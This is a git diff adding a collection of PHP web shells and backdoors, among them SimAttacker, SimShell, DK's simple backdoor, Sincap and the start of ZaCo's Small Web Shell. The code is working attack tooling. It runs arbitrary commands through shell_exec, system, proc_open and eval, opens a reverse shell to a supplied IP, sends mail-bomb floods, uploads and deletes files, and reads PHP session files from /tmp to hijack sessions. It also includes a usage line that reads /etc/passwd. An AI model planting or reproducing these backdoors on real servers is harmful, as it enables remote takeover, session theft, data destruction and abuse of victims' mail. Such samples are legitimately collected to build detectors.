+	?>
+	">
+				<span style="text-decoration: none"><font color="#000000">File Manager</font></span></a></font></span></font></b></p>
+				<p align="center"><b><a href="?id=cmd">
+				<span style="text-decoration: none">
+				<font face="Tahoma" size="2" color="#000000">
+				CMD</font></span></a><font face="Tahoma" size="2"> Shell</font></b></p>
+				<p align="center"><b><a href="?id=fake-mail">
+				<font face="Tahoma" size="2" color="#000000">
+				<span style="text-decoration: none">Fake mail</span></font></a></b></p>
+				<p align="center"><b>
+				<font face="Tahoma" size="2" color="#000000">
+				<a href="?id=cshell">
+				<span style="text-decoration: none"><font color="#000000">Connect Back</font></span></a></font></b></p>
+				<p align="center"><b>
+				<font color="#000000" face="Tahoma" size="2">
+				<a href="?id=">
+				<span style="text-decoration: none"><font color="#000000">About</font></span></a></font></b></p>
+				<p>&nbsp;<p align="center">&nbsp;</td>
+			<td height="422" width="82%" style="border: 1px dotted #FFCC66" align="center">
+			<?
+			//*******************************************************
+			//Start Programs About US
+			$id=$_GET['id'];
+
+			if ($id=="") {
+			echo "
+			<font face='Arial Black' color='#808080' size='1'>
+***************************************************************************<br>
+&nbsp;Iranian Hackers : WWW.SIMORGH-EV.COM <br>
+&nbsp;Programer : Hossein Asgary <br>
+&nbsp;Note : SimAttacker&nbsp; Have copyright from simorgh security Group  <br>
+&nbsp;please : If you find bug or problems in program , tell me by : <br>
+&nbsp;e-mail : admin(at)simorgh-ev(dot)com<br>
+Enjoy :) [Only 4 Best Friends ] <br>
+***************************************************************************</font></span></p>
+";
+
+echo "<font color='#333333' size='2'>OS :". php_uname();
+echo "<br>IP :". 
+($_SERVER['REMOTE_ADDR']);
+echo "</font>";
+
+
+			}
+			//************************************************************
+			//cmd-command line
+			$cmd=$_POST['cmd'];
+			if($id=="cmd"){
+		$result=shell_exec("$cmd");
+		echo "<br><center><h3> CMD ExeCute </h3></center>" ;
+		echo "<center>
+		<textarea rows=20 cols=70 >$result</textarea><br>
+		<form method='POST' action=''>
+		<input type='hidden' name='id' value='cmd'>
+		<input type='text' size='80' name='cmd' value='$cmd'>
+		<input type='submit' value='cmd'><br>";
+			
+			
+			
+			}
+			
+		//********************************************************	
+		
+		//fake mail = Use victim server 4 DOS - fake mail 
+		if ( $id=="fake-mail"){
+		error_reporting(0);
+		echo "<br><center><h3> Fake Mail- DOS E-mail By Victim Server </h3></center>" ;
+		echo "<center><form method='post' action=''>
+		Victim Mail :<br><input type='text' name='to' ><br>
+		Number-Mail :<br><input type='text' size='5' name='nom' value='100'><br>
+		Comments:
+		<br>
+		<textarea rows='10' cols=50 name='Comments' ></textarea><br>
+		<input type='submit' value='Send Mail Strm ' >
+		</form></center>";
+		//send Storm Mail
+		$to=$_POST['to'];
+		$nom=$_POST['nom'];
+		$Comments=$_POST['Comments'];
+		if ($to <> "" ){
+		for ($i = 0; $i < $nom ; $i++){
+		$from = rand (71,1020000000)."@"."Attacker.com";
+		$subject= md5("$from");
+        mail($to,$subject,$Comments,"From:$from");
+        echo "$i is ok";
+        }      
+        echo "<script language='javascript'> alert('Sending Mail - please waite ...')</script>";
+        }
+		}
+		//********************************************************
+
+			//Connect Back -Firewall Bypass
+			if ($id=="cshell"){
+			echo "<br>Connect back Shell , bypass Firewalls<br>
+			For user :<br>
+			nc -l -p 1019 <br>
+			<hr>
+			<form method='POST' action=''><br>
+			Your IP & BindPort:<br>
+			<input type='text' name='mip' >
+			<input type='text' name='bport' size='5' value='1019'><br>
+			<input type='submit' value='Connect Back'>
+			</form>";
+		 $mip=$_POST['mip'];
+		 $bport=$_POST['bport'];
+		 if ($mip <> "")
+		 {
+		 $fp=fsockopen($mip , $bport , $errno, $errstr);
+		 if (!$fp){
+		       $result = "Error: could not open socket connection";
+		 }
+		 else {
+		 fputs ($fp ,"\n*********************************************\nWelcome T0 SimAttacker 1.00  ready 2 USe\n*********************************************\n\n");
+	  while(!feof($fp)){ 
+       fputs ($fp," bash # ");
+       $result= fgets ($fp, 4096);
+      $message=`$result`;
+       fputs ($fp,"--> ".$message."\n");
+      }
+      fclose ($fp);
+		 }
+		 }
+			}
+			
+		//********************************************************
+			//Spy File Manager
+			$homedir=getcwd();
+			$dir=realpath($_GET['dir'])."/";
+			if ($id=="fm"){
+			echo "<br><b><p align='left'>&nbsp;Home:</b> $homedir 
+                  &nbsp;<b>
+                  <form action='' method='GET'>
+                  &nbsp;Path:</b>
+                  <input type='hidden' name='id' value='fm'>
+                  <input type='text' name='dir' size='80' value='$dir'>
+                  <input type='submit' value='dir'>
+                  </form>
+                 <br>";
+
+			echo "
+
+<div align='center'>
+
+<table border='1' id='table1' style='border: 1px #333333' height='90' cellspacing='0' cellpadding='0'>
+	<tr>
+		<td width='300' height='30' align='left'><b><font size='2'>File / Folder Name</font></b></td>
+		<td height='28' width='82' align='center'>
+		<font color='#000080' size='2'><b>Size KByte</b></font></td>
+		<td height='28' width='83' align='center'>
+		<font color='#008000' size='2'><b>Download</b></font></td>
+		<td height='28' width='66' align='center'>
+		<font color='#FF9933' size='2'><b>Edit</b></font></td>
+		<td height='28' width='75' align='center'>
+		<font color='#999999' size='2'><b>Chmod</b></font></td>
+		<td height='28' align='center'><font color='#FF0000' size='2'><b>Delete</b></font></td>
+	</tr>";
+		    if (is_dir($dir)){
+		    if ($dh=opendir($dir)){
+		    while (($file = readdir($dh)) !== false) {
+		    $fsize=round(filesize($dir . $file)/1024);
+		
+		    
+	echo " 
+	<tr>
+		<th width='250' height='22' align='left' nowrap>";
+		if (is_dir($dir.$file))
+		{
+		echo "<a href='?id=fm&dir=$dir$file'><span style='text-decoration: none'><font size='2' color='#666666'>&nbsp;$file <font color='#FF0000' size='1'>dir</font>";
+		}
+		else {
+		echo "<font size='2' color='#666666'>&nbsp;$file ";
+		}
+		echo "</a></font></th>
+		<td width='113' align='center' nowrap><font color='#000080' size='2'><b>";
+		if (is_file($dir.$file))
+		{
+		echo "$fsize";
+		}
+		else {
+		echo "&nbsp; ";
+		}
+		echo "
+		</b></font></td>
+		<td width='103' align='center' nowrap>";
+		if (is_file($dir.$file)){
+		if (is_readable($dir.$file)){
+		echo "<a href='?id=fm&fdownload=$dir$file'><span style='text-decoration: none'><font size='2' color='#008000'>download";
+		}else {
+		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+		 }
+		}else {
+		echo "&nbsp;";
+		 }
+		echo "
+		</a></font></td>
+		<td width='77' align='center' nowrap>";
+		if (is_file($dir.$file))
+		{
+		if (is_readable($dir.$file)){
+		echo "<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decoration: none'><font color='#FF9933' size='2'>Edit";
+		}else {
+		echo "<font size='1' color='#FF0000'><b>No ReadAble</b>";
+		 }
+		}else {
+		echo "&nbsp;";
+		 }
+		echo "
+		</a></font></td>
+		<td width='86' align='center' nowrap>";
+		if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
+		echo "<font size='1' color='#999999'>Dont in windows";
+		}
+		else {
+		echo "<a href='?id=fm&fchmod=$dir$file'><span style='text-decoration: none'><font size='2' color='#999999'>Chmod";
+		}
+		echo "</a></font></td>
+		<td width='86'align='center' nowrap><a href='?id=fm&fdelete=$dir$file'><span style='text-decoration: none'><font size='2' color='#FF0000'>Delete</a></font></td>
+	</tr>
+	";
+		      }
+		      closedir($dh);
+		    } 
+		    }
+		    echo "</table>
+<form enctype='multipart/form-data' action='' method='POST'>
+ <input type='hidden' name='MAX_FILE_SIZE' value='300000' />
+ Send this file: <input name='userfile' type='file' />
+ <inpt type='hidden' name='Fupath'  value='$dir'>
+ <input type='submit' value='Send File' />
+</form> 
+		    </div>";
+			}
+//Upload Files 
+$rpath=$_GET['dir'];
+if ($rpath <> "") {
+$uploadfile = $rpath."/" . $_FILES['userfile']['name'];
+print "<pre>";
+if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) {
+echo "<script language='javascript'> alert('\:D Successfully uploaded.!')</script>";
+echo "<script language='javascript'> history.back(2)</script>";
+}
+ }
+ //file deleted
+$frpath=$_GET['fdelete'];
+if ($frpath <> "") {
+if (is_dir($frpath)){
+$matches = glob($frpath . '/*.*');
+if ( is_array ( $matches ) ) {
+  foreach ( $matches as $filename) {
+  unlink ($filename);
+  rmdir("$frpath");
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+echo "<script language='javascript'> history.back(1)</script>";
+  }
+  }
+  }
+  else{
+echo "<script language='javascript'> alert('Success! Please refresh')</script>";
+unlink ("$frpath");
+echo "<script language='javascript'> history.back(1)</script>";
+exit(0);
+
+  }
+  
+
+}
+			?>
+			
+			</td>
+		</tr>
+		<tr>
+			<td style="border: 1px dotted #FFCC66">
+			<p align="center"><font color="#666666" size="1" face="Tahoma"><br>
+			Copyright 2004-Simorgh Security<br>
+			Hossein-Asgari<br>
+			</font><font color="#c0c0c0" size="1" face="Tahoma">
+		<a style="TEXT-DECORATION: none" href="http://www.simorgh-ev.com">
+		<font color="#666666">www.simorgh-ev.com</font></a></font></td>
+		</tr>
+	</table>
+</div>
+
+</body>
+
+</html>
\ No newline at end of file
diff --git a/php/SimShell 1.0 - Simorgh Security MGZ.php b/php/SimShell 1.0 - Simorgh Security MGZ.php
new file mode 100644
index 0000000..2fff063
--- /dev/null
+++ b/php/SimShell 1.0 - Simorgh Security MGZ.php	
@@ -0,0 +1,180 @@
+<?php
+
+/*Simorgh Security Magazine */
+  session_start();
+if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
+    $_SESSION['cwd'] = getcwd();
+    $_SESSION['history'] = array();
+    $_SESSION['output'] = '';
+  }
+  
+  if (!empty($_REQUEST['command'])) {
+    if (get_magic_quotes_gpc()) {
+      $_REQUEST['command'] = stripslashes($_REQUEST['command']);
+    }
+    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
+      unset($_SESSION['history'][$i]);
+    
+    array_unshift($_SESSION['history'], $_REQUEST['command']);
+  
+    $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
+
+    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
+      $_SESSION['cwd'] = dirname(__FILE__);
+    } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
+
+      if ($regs[1][0] == '/') {
+
+        $new_dir = $regs[1];
+      } else {
+
+        $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+      }
+      
+
+      while (strpos($new_dir, '/./') !== false)
+        $new_dir = str_replace('/./', '/', $new_dir);
+
+
+      while (strpos($new_dir, '//') !== false)
+        $new_dir = str_replace('//', '/', $new_dir);
+
+      while (preg_match('|/\.\.(?!\.)|', $new_dir))
+        $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+      
+      if ($new_dir == '') $new_dir = '/';
+      
+
+      if (@chdir($new_dir)) {
+        $_SESSION['cwd'] = $new_dir;
+      } else {
+        $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+      }
+      
+    } else {
+
+      chdir($_SESSION['cwd']);
+
+      $length = strcspn($_REQUEST['command'], " \t");
+      $token = substr($_REQUEST['command'], 0, $length);
+      if (isset($aliases[$token]))
+        $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
+    
+      $p = proc_open($_REQUEST['command'],
+                     array(1 => array('pipe', 'w'),
+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
+?>
+
+<head>
+  <title>SimShell - Simorgh Security MGZ</title>
+  <link rel="stylesheet" href="Simshell.css" type="text/css" />
+
+  <script type="text/javascript" language="JavaScript">
+  var current_line = 0;
+  var command_hist = new Array(<?php echo $js_command_hist ?>);
+  var last = 0;
+
+  function key(e) {
+    if (!e) var e = window.event;
+
+    if (e.keyCode == 38 && current_line < command_hist.length-1) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line++;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+    if (e.keyCode == 40 && current_line > 0) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line--;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+  }
+
+function init() {
+  document.shell.setAttribute("autocomplete", "off");
+  document.shell.output.scrollTop = document.shell.output.scrollHeight;
+  document.shell.command.focus();
+}
+
+  </script>
+</head>
+
+<body   onload="init()" style="color: #00FF00; background-color: #000000">
+
+<span style="background-color: #000000">
+
+
+
+</body>
+
+</body>
+</html>
+
+
+
+</span>
+
+
+
+<p><span style="background-color: #000000">&nbsp;Directory: </span> <code>
+<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code></p>
+
+<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
+<div style="width: 900; height: 454">
+<textarea name="output" readonly="readonly" cols="120" rows="20" style="color: #CCFF33; border: 1px dashed #FF0000; background-color: #000000">
+<?php
+$lines = substr_count($_SESSION['output'], "\n");
+$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
+echo rtrim($padding . $_SESSION['output']);
+?>
+</textarea>
+<p class="prompt" align="justify">
+  cmd:<input class="prompt" name="command" type="text"
+                onkeyup="key(event)" size="60" tabindex="1" style="border: 1px dotted #808080">
+  <input type="submit" value="Enter" /><input type="submit" name="reset" value="Reset" /> Rows: 
+  <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" />
+</p>
+<p class="prompt" align="center">
+  <br>
+  <br>
+&nbsp;<font color="#C0C0C0" size="2">Copyright 2004-Simorgh Security<br>
+  Make On PhpShell Kernel<br>
+  <a href="http://www.simorgh-ev.com" style="text-decoration: none">
+  <font color="#C0C0C0">www.simorgh-ev.com</font></a></font></p>
+</div>
+</form>
+
+
+</html>
\ No newline at end of file
diff --git a/php/SimShell_1.0_-_Simorgh_Security_MGZ.php b/php/SimShell_1.0_-_Simorgh_Security_MGZ.php
new file mode 100644
index 0000000..3b9492a
--- /dev/null
+++ b/php/SimShell_1.0_-_Simorgh_Security_MGZ.php
@@ -0,0 +1,180 @@
+<?php
+
+/*Simorgh Security Magazine */
+  session_start();
+if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
+    $_SESSION['cwd'] = getcwd();
+    $_SESSION['history'] = array();
+    $_SESSION['output'] = '';
+  }
+  
+  if (!empty($_REQUEST['command'])) {
+    if (get_magic_quotes_gpc()) {
+      $_REQUEST['command'] = stripslashes($_REQUEST['command']);
+    }
+    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
+      unset($_SESSION['history'][$i]);
+    
+    array_unshift($_SESSION['history'], $_REQUEST['command']);
+  
+    $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
+
+    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
+      $_SESSION['cwd'] = dirname(__FILE__);
+    } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
+
+      if ($regs[1][0] == '/') {
+
+        $new_dir = $regs[1];
+      } else {
+
+        $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+      }
+      
+
+      while (strpos($new_dir, '/./') !== false)
+        $new_dir = str_replace('/./', '/', $new_dir);
+
+
+      while (strpos($new_dir, '//') !== false)
+        $new_dir = str_replace('//', '/', $new_dir);
+
+      while (preg_match('|/\.\.(?!\.)|', $new_dir))
+        $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+      
+      if ($new_dir == '') $new_dir = '/';
+      
+
+      if (@chdir($new_dir)) {
+        $_SESSION['cwd'] = $new_dir;
+      } else {
+        $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+      }
+      
+    } else {
+
+      chdir($_SESSION['cwd']);
+
+      $length = strcspn($_REQUEST['command'], " \t");
+      $token = substr($_REQUEST['command'], 0, $length);
+      if (isset($aliases[$token]))
+        $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
+    
+      $p = proc_open($_REQUEST['command'],
+                     array(1 => array('pipe', 'w'),
+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '<?xml version="1.0" encoding="UTF-8"?>' . "\n";
+?>
+
+<head>
+  <title>SimShell - Simorgh Security MGZ</title>
+  <link rel="stylesheet" href="Simshell.css" type="text/css" />
+
+  <script type="text/javascript" language="JavaScript">
+  var current_line = 0;
+  var command_hist = new Array(<?php echo $js_command_hist ?>);
+  var last = 0;
+
+  function key(e) {
+    if (!e) var e = window.event;
+
+    if (e.keyCode == 38 && current_line < command_hist.length-1) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line++;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+    if (e.keyCode == 40 && current_line > 0) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line--;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+  }
+
+function init() {
+  document.shell.setAttribute("autocomplete", "off");
+  document.shell.output.scrollTop = document.shell.output.scrollHeight;
+  document.shell.command.focus();
+}
+
+  </script>
+</head>
+
+<body   onload="init()" style="color: #00FF00; background-color: #000000">
+
+<span style="background-color: #000000">
+
+
+
+</body>
+
+</body>
+</html>
+
+
+
+</span>
+
+
+
+<p><span style="background-color: #000000">&nbsp;Directory: </span> <code>
+<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code></p>
+
+<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="post">
+<div style="width: 900; height: 454">
+<textarea name="output" readonly="readonly" cols="120" rows="20" style="color: #CCFF33; border: 1px dashed #FF0000; background-color: #000000">
+<?php
+$lines = substr_count($_SESSION['output'], "\n");
+$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
+echo rtrim($padding . $_SESSION['output']);
+?>
+</textarea>
+<p class="prompt" align="justify">
+  cmd:<input class="prompt" name="command" type="text"
+                onkeyup="key(event)" size="60" tabindex="1" style="border: 1px dotted #808080">
+  <input type="submit" value="Enter" /><input type="submit" name="reset" value="Reset" /> Rows: 
+  <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" />
+</p>
+<p class="prompt" align="center">
+  <br>
+  <br>
+&nbsp;<font color="#C0C0C0" size="2">Copyright 2004-Simorgh Security<br>
+  Make On PhpShell Kernel<br>
+  <a href="http://www.simorgh-ev.com" style="text-decoration: none">
+  <font color="#C0C0C0">www.simorgh-ev.com</font></a></font></p>
+</div>
+</form>
+
+
+</html>
diff --git a/php/Simple_PHP_backdoor_by_DK.php b/php/Simple_PHP_backdoor_by_DK.php
new file mode 100644
index 0000000..443a6f0
--- /dev/null
+++ b/php/Simple_PHP_backdoor_by_DK.php
@@ -0,0 +1,19 @@
+
+<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
+
+<?php
+
+if(isset($_REQUEST['cmd'])){
+        echo "<pre>";
+        $cmd = ($_REQUEST['cmd']);
+        system($cmd);
+        echo "</pre>";
+        die;
+}
+
+?>
+
+Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
+
+<!--    http://michaeldaw.org   2006    -->
+
diff --git a/php/Sincap 1.0.php b/php/Sincap 1.0.php
new file mode 100644
index 0000000..96ff07a
--- /dev/null
+++ b/php/Sincap 1.0.php	
@@ -0,0 +1,124 @@
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 6.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>:: AventGrup ::.. - Sincap 1.0 | Session(Oturum) Böceği&nbsp;&nbsp; </title>
+</head>
+
+<body text="#008000" bgcolor="#808080" topmargin="0" leftmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">
+
+<table border="0" width="100%" id="table1" cellspacing="0" cellpadding="0" height="108">
+	<tr>
+    <td width="70" bgcolor="#000000" height="83">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="83" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    Sincap 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="83" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    <br>
+    </font><br>
+    <font color="#858585" face="Verdana" style="font-size: 8pt">www.aventgrup.net&nbsp;<br>
+    </font></span><a href="mailto:shopen@aventgrup.net">
+	<font face="Verdana" style="font-size: 8pt; text-decoration: none" color="#C0C0C0">
+	info@aventgrup.net</font></a><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  	</tr>
+	<tr>
+    <td width="1002" bgcolor="#484848" height="25" colspan="3">
+    <font color="#E5E5E5" style="font-size: 8pt; font-weight: 700" face="Arial">&nbsp; 
+	Linux Sessin ( Oturum ) Böceği</font></td>
+    </tr>
+</table>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#800000" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="8%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;S. 
+    No</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    Adı</font></td>
+    <td width="42%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Oturum 
+    Değeri</font></td>
+    <td width="25%" bgcolor="#B6B6B6">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#000000">&nbsp;Referans</font></td>
+  </tr>
+<tr>
+
+
+<?
+if ($sedat=@opendir("/tmp")){
+while (($ekinci=readdir ($sedat))){
+if (is_file("/tmp/$ekinci")){
+if($ekinci>"sess_"){
+$asortik=$ekinci;
+$baglan=fopen("/tmp/$ekinci",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+$toplam="$toplam$okunan";
+} fclose($baglan); 
+};
+?>
+
+
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+$metin=$toplam;
+$i=explode(";",$metin);
+?>
+
+
+
+
+<?
+foreach($i as $yeni){
+$tampon=explode("|",$yeni);
+$deger1= "$tampon[0]";
+$ich=explode(":",$tampon[1]);
+$tampon3=count($ich);
+$tampon4=$tampon3-1;
+$deger2= "$ich[$tampon4]";
+$is++;
+$temizleme=array(
+'"'=>'',
+'v'=>'',
+'c'=>''
+);
+$degerT= strtr($deger2,$temizleme);
+?>
+    <td width="8%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $is;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $deger1;?></font></td>
+    <td width="42%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;<?echo $degerT;?></font></td>
+    <td width="25%" bgcolor="#E5E5E5" align="left" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#000000">&nbsp;-</td>
+
+</tr>
+<?};?>
+
+</table>
+
+</body>
+
+</html>
+
+
diff --git a/php/Small Web Shell by ZaCo.php b/php/Small Web Shell by ZaCo.php
new file mode 100644
index 0000000..70426ca
--- /dev/null
+++ b/php/Small Web Shell by ZaCo.php	
@@ -0,0 +1,501 @@
+<?
+  ##########################################################
+ # Small PHP Web Shell by ZaCo (c) 2004-2006                #
+ #  +POST method                                            #
+ #  +MySQL Client+Dumper for DB  and tables                 #
+ #  +PHP eval in text format and html for phpinfo() example #
+ # PREVED: sn0w, Zadoxlik, Rebz, SkvoznoY, PinkPanther      #
+ # For antichat.ru and cup.su friends usage                 #
+ # All bugs -> mailo:zaco@yandex.ru                         #
+ # Just for fun :)                                          #
+  ##########################################################
+error_reporting(E_ALL);
+@set_time_limit(0);
+function magic_q($s)
+{
+if(get_magic_quotes_gpc())
+{
+$s=str_replace('\\\'','\'',$s);
+$s=str_replace('\\\\','\\',$s);
+$s=str_replace('\\"','"',$s);
+$s=str_replace('\\\0','\0',$s);
+}
+return $s;
+}
+function get_perms($fn)
+{
+$mode=fileperms($fn);
+$perms='';
+$perms .= ($mode & 00400) ? 'r' : '-';
+$perms .= ($mode & 00200) ? 'w' : '-';
+$perms .= ($mode & 00100) ? 'x' : '-';
+$perms .= ($mode & 00040) ? 'r' : '-';
+$perms .= ($mode & 00020) ? 'w' : '-';
+$perms .= ($mode & 00010) ? 'x' : '-';
+$perms .= ($mode & 00004) ? 'r' : '-';
+$perms .= ($mode & 00002) ? 'w' : '-';
+$perms .= ($mode & 00001) ? 'x' : '-';
+return $perms;
+}
+$head=<<<headka
+<html>
+<head>
+<title>Small Web Shell by ZaCo</title>
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
+</head>
+<body link=palegreen vlink=palegreen text=palegreen bgcolor=#2B2F34>
+<style>
+textarea {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: Fixedsys bold;
+}
+input {
+BORDER-RIGHT:  #ffffff 1px solid;
+BORDER-TOP:    #999999 1px solid;
+BORDER-LEFT:   #999999 1px solid;
+BORDER-BOTTOM: #ffffff 1px solid;
+BACKGROUND-COLOR: #e4e0d8;
+font: 8pt Verdana;
+}
+</style>
+headka;
+$page=isset($_POST['page'])?$_POST['page']:(isset($_SERVER['QUERY_STRING'])?$_SERVER['QUERY_STRING']:'');
+$page=$page==''||($page!='cmd'&&$page!='mysql'&&$page!='eval')?'cmd':$page;
+$winda=strpos(strtolower(php_uname()),'wind');
+define('format',50);
+$pages='<center>###<a href=\''.basename(__FILE__).'\'>cmd</a>###<a href=\''.basename(__FILE__).'?mysql\'>mysql</a>###<a href=\''.basename(__FILE__).'?eval\'>eval</a>###</center>'.($winda===false?'id :'.`id`:'');
+switch($page)
+{
+case 'eval':
+{
+$eval_value=isset($_POST['eval_value'])?$_POST['eval_value']:'';
+$eval_value=magic_q($eval_value);
+$action=isset($_POST['action'])?$_POST['action']:'eval';
+if($action=='eval_in_html') @eval($eval_value);
+else
+{
+echo($head.$pages);
+?>
+<hr>
+<form method=post>
+<textarea cols=120 rows=20 name='eval_value'><?@eval($eval_value);?></textarea>
+<input name='action' value='eval' type='submit'>
+<input name='action' value='eval_in_html' type='submit'>
+<input name='page' value='eval' type=hidden>
+</form>
+<hr>
+<?
+}
+break;
+}
+case 'cmd':
+{
+$cmd=!empty($_POST['cmd'])?magic_q($_POST['cmd']):'';
+$work_dir=isset($_POST['work_dir'])?$_POST['work_dir']:getcwd();
+$action=isset($_POST['action'])?$_POST['action']:'cmd';
+if(@is_dir($work_dir))
+{
+@chdir($work_dir);
+$work_dir=getcwd();
+if($work_dir=='')$work_dir='/';
+else if(!($work_dir{strlen($work_dir)-1}=='/'||$work_dir{strlen($work_dir)-1}=='\\')) $work_dir.='/';
+}
+else if(file_exists($work_dir))$work_dir=realpath($work_dir);
+$work_dir=str_replace('\\','/',$work_dir);
+$e_work_dir=htmlspecialchars($work_dir,ENT_QUOTES);
+switch($action)
+{
+case 'cmd' :
+{
+echo($head.$pages);
+?>
+<form method='post' name='main_form'>
+<input name='work_dir' value='<?=$e_work_dir?>' type=text size=120>
+<input name='page' value='cmd' type=hidden>
+<input type=submit value='go'>
+</form>
+<form method=post>
+<input name='cmd' type=text size=120 value='<?=str_replace('\'','&#039;',$cmd)?>'>
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='cmd' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post enctype="multipart/form-data">
+<input type="file" name="filename">
+<input name='work_dir'type=hidden>
+<input name='page' value='cmd' type=hidden>
+<input name='action' value='upload' type=submit onclick="work_dir.value=document.main_form.work_dir.value;">
+</form>
+<form method=post>
+<input name='fname' type=text size=120><br>
+<input name='archive' type=radio value='none'>without arch
